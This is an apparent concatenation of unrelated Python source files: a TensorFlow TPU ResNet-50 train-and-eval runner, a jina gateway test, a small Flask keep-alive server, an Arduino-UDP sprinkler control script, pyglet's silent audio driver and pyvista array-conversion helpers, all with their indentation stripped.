self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
|
train_and_eval_runner.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bypass TPUEstimator for ResNet-50 Train."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import operator
import os
import threading
import time
from absl import flags
import tensorflow.compat.v1 as tf
# copybara:strip_begin
from REDACTED import xprof_analysis_client as profiler_client
# copybara:strip_end
from REDACTED import rewriter_config_pb2
from REDACTED.tensorflow.python.tpu import device_assignment
from REDACTED.tensorflow.python.tpu import tpu
from REDACTED.tensorflow.python.tpu import tpu_feed
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.tpu import training_loop
from REDACTED.tensorflow.python.tpu.ops import tpu_ops
FLAGS = flags.FLAGS
_IS_PADDED = "is_padded"
flags.DEFINE_string(
"master",
default=None,
help="The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.")
flags.DEFINE_string(
"gcp_project",
default=None,
help="Project name for the Cloud TPU-enabled project. If not specified, we "
"will attempt to automatically detect the GCE project from metadata.")
flags.DEFINE_string(
"tpu_zone",
default=None,
help="GCE zone where the Cloud TPU is located in. If not specified, we "
"will attempt to automatically detect the GCE project from metadata.")
flags.DEFINE_integer(
"replicas_per_host", default=8, help=("Number of replicas per host."))
flags.DEFINE_bool("enable_summary", default=False, help=("Enable summary"))
flags.DEFINE_string(
"model_dir",
default=None,
help=("The directory where the model and summaries are stored."))
flags.DEFINE_bool("save_checkpoint", default=False, help=("Save checkpoint"))
flags.DEFINE_bool(
"restore_checkpoint", default=False, help=("Restore checkpoint"))
flags.DEFINE_integer(
"sleep_after_init", default=60, help=("Sleep for N seconds after init."))
flags.DEFINE_bool(
"enable_mlir_bridge", default=False, help=("Enable TF/XLA MLIR bridge"))
flags.DEFINE_bool(
"enable_profiling",
default=False,
help=("Get xprof traces at"
"the start and middle of the train loops"))
_NUM_CORES_TO_COMPUTATION_SHAPE = {
1: [1, 1, 1, 1],
2: [1, 1, 1, 2],
4: [1, 2, 1, 2],
8: [2, 2, 1, 2],
16: [4, 2, 1, 2],
}
def _profiler_callback(comment, session_id):
if session_id is None:
tf.logging.info("Profiling failed for %s", comment)
else:
tf.logging.info("Profiling succeeded for %s. Overview page url:", comment)
# copybara:strip_begin
tf.logging.info(
"https://REDACTED/overview_page.html?session_id=%s" %
session_id)
# copybara:strip_end
# Decorator function for tpu computation func that was passed to tpu.rewrite()
# if there are embedded train and eval loops in this func, trace tools will
# generate step markers for each iteration.
def on_device_train_and_eval_loops(func):
# Value for this attribute is from xla.DebugOptions.StepMarkerLocation.
setattr(func, "step_marker_location", "STEP_MARK_AT_SECOND_LEVEL_WHILE_LOOP")
return func
def device_for_tpu_core(host_name, core=0):
return host_name + "/device:TPU_REPLICATED_CORE:%d" % core
def device_for_host(host_name):
return host_name + "/device:CPU:0"
class TrainAndEvalRunner(object):
"""Remove init overheads in TPU Estimator via direct session.run calls."""
def __init__(self,
iterations_per_loop,
train_steps,
eval_steps,
num_replicas,
eval_dataset_repeats=True,
do_initialize=True):
self.feature_structure = {}
self.infeed_op = {}
self.num_replicas = num_replicas
self.eval_dataset_repeats = eval_dataset_repeats
# Set number of input graphs to number of hosts up to a maximum of 32.
self.num_input_graphs = min(32,
self.num_replicas // FLAGS.replicas_per_host)
# Following data has separated copies for training and eval, thus
# represented as a map from is_train(boolean) to actual data
self.dataset_initializer = {True: [], False: []}
self.input_graph = {True: [], False: []}
self.input_sess = {True: [], False: []}
self.enqueue_ops = {True: [], False: []}
for _ in range(self.num_input_graphs):
self.input_graph[True].append(tf.Graph())
self.input_graph[False].append(tf.Graph())
self.dataset_initializer[True].append([])
self.dataset_initializer[False].append([])
self.enqueue_ops[True].append([])
self.enqueue_ops[False].append([])
self.input_sess[True].append([])
self.input_sess[False].append([])
# dequeue_ops is only for eval
self.dequeue_ops = []
self.iterations_per_loop = iterations_per_loop
self.sess = None
self.output_sess = None
self.train_eval_thread = None
self.graph = tf.Graph()
if iterations_per_loop != 0 and train_steps % iterations_per_loop != 0:
train_steps = iterations_per_loop * int(
math.ceil(train_steps / iterations_per_loop))
self.train_steps = train_steps
if iterations_per_loop == 0:
self.max_train_iterations = 1
else:
self.max_train_iterations = train_steps // iterations_per_loop
self.eval_steps = int(eval_steps)
self.train_batch_size = 0
self.eval_batch_size = 0
self.eval_has_labels = 0
self.model_fn = None
self.num_outfeeds = self.eval_steps
self.config = tf.ConfigProto(
operation_timeout_in_ms=600 * 60 * 1000,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
if FLAGS.enable_mlir_bridge:
self.config.experimental.enable_mlir_bridge = True
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.master,
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project,
job_name="tpu_worker")
self.master = tpu_cluster_resolver.get_master()
self.job_name = tpu_cluster_resolver.get_job_name() or "tpu_worker"
self.embedding_config = None
self.device_topology = None
if do_initialize:
self.device_topology = tf.Session(
self.master, config=self.config).run(tpu.initialize_system())
def maybe_capture_embedding_inputs(self, inputs, is_training):
pass
def maybe_add_embedding_enqueue_ops_int(self, is_training, enqueue_ops):
pass
def maybe_get_embedding_train_op(self):
return tf.no_op()
def maybe_add_embedding_features(self, features, hook_dummy_variables):
pass
def maybe_load_embedding_vars(self):
pass
def get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
return "/job:%s/task:%d" % (self.job_name, host_id)
def build_enqueue_ops(self, input_fn, is_training, input_partition_dims,
params):
"""Build enqueue operations for the input pipeline in a given host.
Args:
input_fn: dataset input graph generation function
is_training: boolean indicates if it is training
input_partition_dims: list of integers to partition input
params: hyper parameters
"""
def _tpu_ordinal_fn(shard_index_in_host):
replica_id = self.device_assignment.lookup_replicas(
host_id, logical_core=0)[shard_index_in_host]
return self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
host_id = params["dataset_index"]
gindex = host_id % self.num_input_graphs
with self.input_graph[is_training][gindex].as_default():
with tf.device(device_for_host(self.get_host(host_id))):
dataset = input_fn(params)
if not is_training and self.eval_dataset_repeats:
dataset = dataset.cache().repeat()
iterator = dataset.make_initializable_iterator()
self.dataset_initializer[is_training][gindex].append(
iterator.initializer)
def enqueue_ops_fn(idx):
"""Generate the infeed enqueue ops graph."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(FLAGS.replicas_per_host):
with tf.control_dependencies(control_deps):
self.feature_structure[is_training] = iterator.get_next()
self.maybe_capture_embedding_inputs(
self.feature_structure[is_training], is_training)
flattened_inputs = tf.nest.flatten(
self.feature_structure[is_training])
control_deps.extend(flattened_inputs)
if input_partition_dims:
padded_inputs = []
for inp in flattened_inputs:
if inp.shape.ndims < len(input_partition_dims):
padded_inputs.append(inp)
continue
paddings = []
for i, j in enumerate(input_partition_dims):
r = inp.shape.as_list()[i] % j
if r > 0:
paddings.append([0, j - r])
else:
paddings.append([0, 0])
for i in range(inp.shape.ndims - len(input_partition_dims)):
paddings.append([0, 0])
padded_inputs.append(tf.pad(inp, paddings))
per_host_sharded_inputs.append(padded_inputs)
else:
per_host_sharded_inputs.append(flattened_inputs)
if input_partition_dims:
flattened_input_dims = []
for i in per_host_sharded_inputs[0]:
if i.shape.ndims == len(input_partition_dims):
flattened_input_dims.append(input_partition_dims)
elif i.shape.ndims > len(input_partition_dims):
flattened_input_dims.append(
input_partition_dims + [1] *
(i.shape.ndims - len(input_partition_dims)))
else:
flattened_input_dims.append([1] * i.shape.ndims)
# pylint: disable=protected-access
self.infeed_op[is_training] = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
with tf.control_dependencies(
self.infeed_op[is_training].generate_enqueue_ops(
per_host_sharded_inputs)):
return idx + 1
else:
self.infeed_op[is_training] = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = (
self.infeed_op[is_training].generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=_tpu_ordinal_fn))
self.maybe_add_embedding_enqueue_ops_int(
is_training, per_host_enqueue_ops)
with tf.control_dependencies(per_host_enqueue_ops):
return idx + 1
iterations = self.iterations_per_loop if is_training else self.eval_steps
self.enqueue_ops[is_training][gindex].append(
tf.while_loop(
lambda i: tf.less(i, iterations),
enqueue_ops_fn, [tf.constant(0)],
parallel_iterations=1))
def launch_profiler(self):
"""Launches a profiling session to collect a trace from worker-0."""
# copybara:strip_begin
profiler = profiler_client.XprofAnalysisClient()
result = profiler.collect(
hosts=[FLAGS.master],
duration_ms=5000,
callback=functools.partial(_profiler_callback, "1st session"))
# copybara:strip_end
if result == profiler_client.PROFILED_IN_NEW_THREAD:
tf.logging.info("A profiler session launched in a new thread.")
else:
tf.logging.info("profiler.collect() failed.")
def eval_step(self):
"""One evaluation step."""
inp = self.infeed_op[False].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[False])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
if self.eval_has_labels:
features, labels = tf.nest.pack_sequence_as(self.feature_structure[False],
inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[False], inp)
labels = None
self.maybe_add_embedding_features(features, False)
_, self.predict_output = self.model_fn(features, labels, False)
for _ in self.predict_output:
self.dequeue_ops.append([])
with tf.device(device_for_tpu_core(self.get_host(0))):
return [
tpu_ops.outfeed_enqueue_tuple(tf.nest.flatten(self.predict_output))
]
@tpu_function.on_device_training_loop
def eval_loop(self):
tf.get_variable_scope().reuse_variables()
return training_loop.repeat(int(self.eval_steps), self.eval_step)
def initialize(self,
train_input_fn,
eval_input_fn,
model_fn,
train_batch_size,
eval_batch_size,
input_partition_dims=None,
init_fn=None,
train_has_labels=True,
eval_has_labels=True,
params=None,
num_partitions=None):
"""Build graphs for the TPU device and the input pipelines."""
num_cores_per_replica = 1
num_cores_per_replica = functools.reduce(
operator.mul, input_partition_dims
) if input_partition_dims else num_partitions if num_partitions else 1
self.device_assignment = device_assignment.device_assignment(
topology=self.device_topology,
computation_shape=_NUM_CORES_TO_COMPUTATION_SHAPE[
num_cores_per_replica],
num_replicas=self.num_replicas)
self.train_batch_size = train_batch_size
self.eval_batch_size = eval_batch_size
self.eval_has_labels = eval_has_labels
self.model_fn = model_fn
if params is None:
params = {}
params["dataset_num_shards"] = self.num_replicas // FLAGS.replicas_per_host
per_replica_train_batch_size = train_batch_size // self.num_replicas
per_replica_eval_batch_size = eval_batch_size // self.num_replicas
for i in range(self.num_replicas // FLAGS.replicas_per_host):
params["dataset_index"] = i
params["batch_size"] = per_replica_train_batch_size
self.build_enqueue_ops(train_input_fn, True, input_partition_dims, params)
if self.eval_steps > 0:
params["batch_size"] = per_replica_eval_batch_size
self.build_enqueue_ops(eval_input_fn, False, input_partition_dims,
params)
def train_step(_):
"""One train step."""
inp = self.infeed_op[True].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[True])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
if train_has_labels:
features, labels = tf.nest.pack_sequence_as(
self.feature_structure[True], inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[True], inp)
labels = None
self.maybe_add_embedding_features(features, True)
train_op, _ = model_fn(features, labels, True)
embedding_train_op = self.maybe_get_embedding_train_op()
with tf.device(device_for_tpu_core(self.get_host(0))):
with tf.control_dependencies([train_op, embedding_train_op]):
return tf.constant(0)
@tpu_function.on_device_training_loop
def train_loop():
return training_loop.repeat(self.iterations_per_loop, train_step,
tf.constant(0))
def train_eval_step():
with tf.control_dependencies(train_loop()):
if self.eval_steps > 0:
return self.eval_loop()
else:
return tf.no_op()
@on_device_train_and_eval_loops
def train_eval_loop():
return training_loop.repeat(self.max_train_iterations, train_eval_step)
with self.graph.as_default():
(self.train_eval_op,) = tpu.shard(
train_eval_loop,
inputs=[],
num_shards=self.num_replicas,
outputs_from_all_shards=False,
device_assignment=self.device_assignment)
if FLAGS.model_dir:
tf.io.write_graph(self.graph, FLAGS.model_dir, "graph.pbtxt")
output_graph = tf.Graph()
if self.eval_steps > 0:
with output_graph.as_default():
flatten_output = tf.nest.flatten(self.predict_output)
self.dequeue_ops = [[] for _ in flatten_output]
tensor_dtypes = [v.dtype for v in flatten_output]
tensor_shapes = [v.shape for v in flatten_output]
is_padded_index = flatten_output.index(
self.predict_output[_IS_PADDED]
) if _IS_PADDED in self.predict_output else -1
for i in range(self.num_replicas // FLAGS.replicas_per_host):
with tf.device(device_for_host(self.get_host(i))):
host_dequeue_ops = [[] for _ in flatten_output]
for j in range(FLAGS.replicas_per_host):
replica_id = self.device_assignment.lookup_replicas(i, 0)[j]
ordinal = self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
dequeue_ops = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal)
if is_padded_index >= 0:
num_non_pad = tf.shape(
dequeue_ops[is_padded_index])[0] - tf.reduce_sum(
tf.cast(dequeue_ops[is_padded_index], tf.int32))
dequeue_ops = [
tf.slice(k, [0] * k.shape.ndims,
[num_non_pad] + [-1] * (k.shape.ndims - 1))
for k in dequeue_ops
]
for k, item in enumerate(dequeue_ops):
host_dequeue_ops[k].append(item)
for k in range(len(self.predict_output)):
self.dequeue_ops[k].append(tf.concat(host_dequeue_ops[k], axis=0))
self.sess = tf.Session(self.master, graph=self.graph, config=self.config)
for is_training in [True, False]:
if is_training or self.eval_steps > 0:
for i in range(self.num_input_graphs):
with self.input_graph[is_training][i].as_default():
self.input_sess[is_training][i] = tf.Session(
self.master,
graph=self.input_graph[is_training][i],
config=self.config)
self.input_sess[is_training][i].run(
self.dataset_initializer[is_training][i])
self.output_sess = tf.Session(
self.master, graph=output_graph, config=self.config)
with self.graph.as_default():
_ = tf.train.get_or_create_global_step()
if init_fn:
init_fn()
checkpoint_path = tf.train.latest_checkpoint(
FLAGS.model_dir) if FLAGS.model_dir else None
if FLAGS.restore_checkpoint and checkpoint_path:
tf.train.Saver().restore(self.sess, checkpoint_path)
else:
self.sess.run(tf.global_variables_initializer())
self.sess.run(tf.local_variables_initializer())
self.maybe_load_embedding_vars()
self.global_step = self.sess.run(tf.train.get_global_step(self.graph))
def train_eval_thread_fn(sess, train_eval_op):
sess.run([train_eval_op])
# Start the just in time compilation of the model function
self.train_eval_thread = threading.Thread(
target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
self.train_eval_thread.start()
# Sleep for JTC to finish
time.sleep(FLAGS.sleep_after_init)
def train_and_eval(self,
eval_init_fn=None,
eval_finish_fn=None,
run_finish_fn=None):
"""Run the Train steps on the TPU device."""
if FLAGS.enable_summary:
output_dir = os.path.join(FLAGS.model_dir, "eval")
tf.gfile.MakeDirs(output_dir)
summary_writer = tf.summary.FileWriter(output_dir)
else:
summary_writer = None
def infeed_thread_fn(thread_index):
# Wait for condition
"""Build and infeed session.run calls in a background thread."""
for _ in range(self.max_train_iterations):
self.input_sess[True][thread_index].run(
[self.enqueue_ops[True][thread_index]])
if self.eval_steps > 0:
if not self.eval_dataset_repeats:
self.input_sess[False][thread_index].run(
self.dataset_initializer[False][thread_index])
self.input_sess[False][thread_index].run(
[self.enqueue_ops[False][thread_index]])
infeed_threads = []
for i in range(self.num_input_graphs):
thread = threading.Thread(target=infeed_thread_fn, args=([i]))
thread.start()
infeed_threads.append(thread)
global_step = self.global_step
if self.eval_steps > 0:
enable_tracing = FLAGS.enable_profiling
if enable_tracing:
self.launch_profiler()
success = False
step_range = [global_step] if self.iterations_per_loop == 0 else range(
global_step, global_step + self.train_steps, self.iterations_per_loop)
for cur_step in step_range:
if not success and eval_init_fn:
eval_init_fn(cur_step)
eval_output = [[] for _ in self.dequeue_ops]
for _ in range(self.num_outfeeds):
for i, t in enumerate(self.output_sess.run(self.dequeue_ops)):
eval_output[i] += list(t)
eval_output = tf.nest.pack_sequence_as(self.predict_output, eval_output)
if eval_finish_fn and not success and eval_finish_fn(
cur_step, eval_output, summary_writer):
success = True
if enable_tracing and cur_step > self.train_steps // 4:
self.launch_profiler()
enable_tracing = False
if run_finish_fn:
run_finish_fn(success)
if FLAGS.save_checkpoint:
with self.graph.as_default():
self.global_step = self.sess.run(tf.train.get_global_step(self.graph))
checkpoint_path = FLAGS.model_dir + "/model.ckpt-%d" % self.global_step
tf.train.Saver().save(self.sess, checkpoint_path)
tf.logging.info("Checkpoint saved to %s", checkpoint_path)
if FLAGS.enable_summary:
summary_writer.close()
self.train_eval_thread.join()
for i in range(self.num_input_graphs):
infeed_threads[i].join()
self.sess.close()
|
test_gateway.py
|
import functools
import time
from threading import Thread
import numpy as np
import pytest
from jina import Document
from jina.enums import CompressAlgo
from jina import Flow
from tests import random_docs
@pytest.mark.slow
@pytest.mark.parametrize('compress_algo', list(CompressAlgo))
def test_compression(compress_algo, mocker):
response_mock = mocker.Mock()
f = Flow(compress=str(compress_algo)).add().add(name='DummyEncoder', shards=2).add()
with f:
f.index(random_docs(10), on_done=response_mock)
response_mock.assert_called()
@pytest.mark.slow
@pytest.mark.parametrize('protocol', ['websocket', 'grpc', 'http'])
def test_grpc_gateway_concurrency(protocol):
def _validate(req, start, status_codes, durations, index):
end = time.time()
durations[index] = end - start
status_codes[index] = req.status.code
def _request(f, status_codes, durations, index):
start = time.time()
f.index(
inputs=(Document() for _ in range(256)),
on_done=functools.partial(
_validate,
start=start,
status_codes=status_codes,
durations=durations,
index=index,
),
batch_size=16,
)
f = Flow(protocol=protocol).add(shards=2)
concurrency = 100
with f:
threads = []
status_codes = [None] * concurrency
durations = [None] * concurrency
for i in range(concurrency):
t = Thread(target=_request, args=(f, status_codes, durations, i))
threads.append(t)
t.start()
for t in threads:
t.join()
success = status_codes.count(0)
failed = len(status_codes) - success
print(
f'clients: {len(durations)}\n'
f'min roundtrip time: {np.min(durations)}\n'
f'max roundtrip time: {np.max(durations)}\n'
f'mean roundtrip time: {np.mean(durations)}\n'
)
assert success >= 1
# In some slow environments, a certain degree of failed
# requests will occur. Here we limit the degree of failed
# requests.
rate = failed / success
assert rate < 0.1
|
B.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return 'JDBot is up and running!!'
def run():
app.run(host='0.0.0.0', port=3000)
def b():
server = Thread(target=run)
server.start()
|
shpritz.py
|
import socket
import serial
import json
import threading
thresh = 30
trig = False
arduino = serial.Serial('/dev/ttyACM0', 9600) # open serial port
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(("127.0.0.1", 3001))
def udp_thread():
global trig
while True:
data, addr = udp.recvfrom(1024) # buffer size is 1024 bytes
msg = json.loads(data)
if "man_trigger" in msg:
trig = msg["man_trigger"]
setShpritz(trig)
def setShpritz(state):
if state:
arduino.write('1')
else:
arduino.write('0')
message = json.dumps({"shpritz": state})
udp.sendto(message, ("127.0.0.1", 3002))
t = threading.Thread(target=udp_thread)
t.start()
if __name__ == '__main__':
while True:
distance = ord(arduino.read())
if not trig:
setShpritz(distance < thresh)
message = {"distance": distance}
udp.sendto(json.dumps(message), ("127.0.0.1", 3002))
|
silent.py
|
#!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
def __init__(self, timestamp, duration):
self.timestamp = timestamp
self.duration = duration
def consume(self, dt):
self.timestamp += dt
self.duration -= dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
# When playing video, length of audio (in secs) to buffer ahead.
_buffer_time = 0.4
# Minimum number of bytes to request from source
_min_update_bytes = 1024
# Maximum sleep time
_sleep_time = 0.2
def __init__(self, source_group, player):
super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)
# System time of first timestamp
self._timestamp_time = None
# List of buffered SilentAudioPacket
self._packets = []
self._packets_duration = 0
self._events = []
# Actual play state.
self._playing = False
# TODO Be nice to avoid creating this thread if user doesn't care
# about EOS events and there's no video format.
# NOTE Use thread.condition as lock for all instance vars used by worker
self._thread = MediaThread(target=self._worker_func)
if source_group.audio_format:
self._thread.start()
def delete(self):
if _debug:
print 'SilentAudioPlayer.delete'
self._thread.stop()
def play(self):
if _debug:
print 'SilentAudioPlayer.play'
self._thread.condition.acquire()
if not self._playing:
self._playing = True
self._timestamp_time = time.time()
self._thread.condition.notify()
self._thread.condition.release()
def stop(self):
if _debug:
print 'SilentAudioPlayer.stop'
self._thread.condition.acquire()
if self._playing:
timestamp = self.get_time()
if self._packets:
packet = self._packets[0]
self._packets_duration -= timestamp - packet.timestamp
packet.consume(timestamp - packet.timestamp)
self._playing = False
self._thread.condition.release()
def clear(self):
if _debug:
print 'SilentAudioPlayer.clear'
self._thread.condition.acquire()
del self._packets[:]
self._packets_duration = 0
del self._events[:]
self._thread.condition.release()
def get_time(self):
if _debug:
print 'SilentAudioPlayer.get_time()'
self._thread.condition.acquire()
packets = self._packets
if self._playing:
# Consume timestamps
result = None
offset = time.time() - self._timestamp_time
while packets:
packet = packets[0]
if offset > packet.duration:
del packets[0]
self._timestamp_time += packet.duration
offset -= packet.duration
self._packets_duration -= packet.duration
else:
packet.consume(offset)
self._packets_duration -= offset
self._timestamp_time += offset
result = packet.timestamp
break
else:
# Paused
if packets:
result = packets[0].timestamp
else:
result = None
self._thread.condition.release()
if _debug:
print 'SilentAudioPlayer.get_time() -> ', result
return result
# Worker func that consumes audio data and dispatches events
def _worker_func(self):
thread = self._thread
#buffered_time = 0
eos = False
events = self._events
while True:
thread.condition.acquire()
if thread.stopped or (eos and not events):
thread.condition.release()
break
# Use up "buffered" audio based on amount of time passed.
timestamp = self.get_time()
if _debug:
print 'timestamp: %r' % timestamp
# Dispatch events
while events and events[0].timestamp <= timestamp:
events[0]._sync_dispatch_to_player(self.player)
del events[0]
# Calculate how much data to request from source
secs = self._buffer_time - self._packets_duration
bytes = secs * self.source_group.audio_format.bytes_per_second
if _debug:
print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)
while bytes > self._min_update_bytes and not eos:
# Pull audio data from source
audio_data = self.source_group.get_audio_data(int(bytes))
if not audio_data and not eos:
events.append(MediaEvent(timestamp, 'on_eos'))
events.append(MediaEvent(timestamp, 'on_source_group_eos'))
eos = True
break
# Pretend to buffer audio data, collect events.
if self._playing and not self._packets:
self._timestamp_time = time.time()
self._packets.append(SilentAudioPacket(audio_data.timestamp,
audio_data.duration))
self._packets_duration += audio_data.duration
for event in audio_data.events:
event.timestamp += audio_data.timestamp
events.append(event)
events.extend(audio_data.events)
bytes -= audio_data.length
sleep_time = self._sleep_time
if not self._playing:
sleep_time = None
elif events and events[0].timestamp and timestamp:
sleep_time = min(sleep_time, events[0].timestamp - timestamp)
if _debug:
print 'SilentAudioPlayer(Worker).sleep', sleep_time
thread.sleep(sleep_time)
thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
# Note that when using this player (automatic if playing back video with
# unsupported audio codec) no events are dispatched (because they are
# normally encoded in the audio packet -- so no EOS events are delivered.
# This is a design flaw.
#
# Also, seeking is broken because the timestamps aren't synchronized with
# the source group.
_time = 0.0
_systime = None
def play(self):
self._systime = time.time()
def stop(self):
self._time = self.get_time()
self._systime = None
def delete(self):
pass
def clear(self):
pass
def get_time(self):
if self._systime is None:
return self._time
else:
return time.time() - self._systime + self._time
class SilentAudioDriver(AbstractAudioDriver):
def create_audio_player(self, source_group, player):
if source_group.audio_format:
return SilentAudioPlayerPacketConsumer(source_group, player)
else:
return SilentTimeAudioPlayer(source_group, player)
def create_audio_driver():
return SilentAudioDriver()
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import signal
import sys
import warnings
from threading import Thread
import threading
import traceback
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = nps.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
-----------
arr : ndarray or vtkDataArry
A numpy array or vtkDataArry to convert
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
vtkDataArray, ndarray, or DataFrame:
the converted array (if input is a NumPy ndaray then returns
``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy
``ndarray``). If pdf==True and the input is ``vtkDataArry``,
return a pandas DataFrame.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return nps.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.Common, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r',]:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
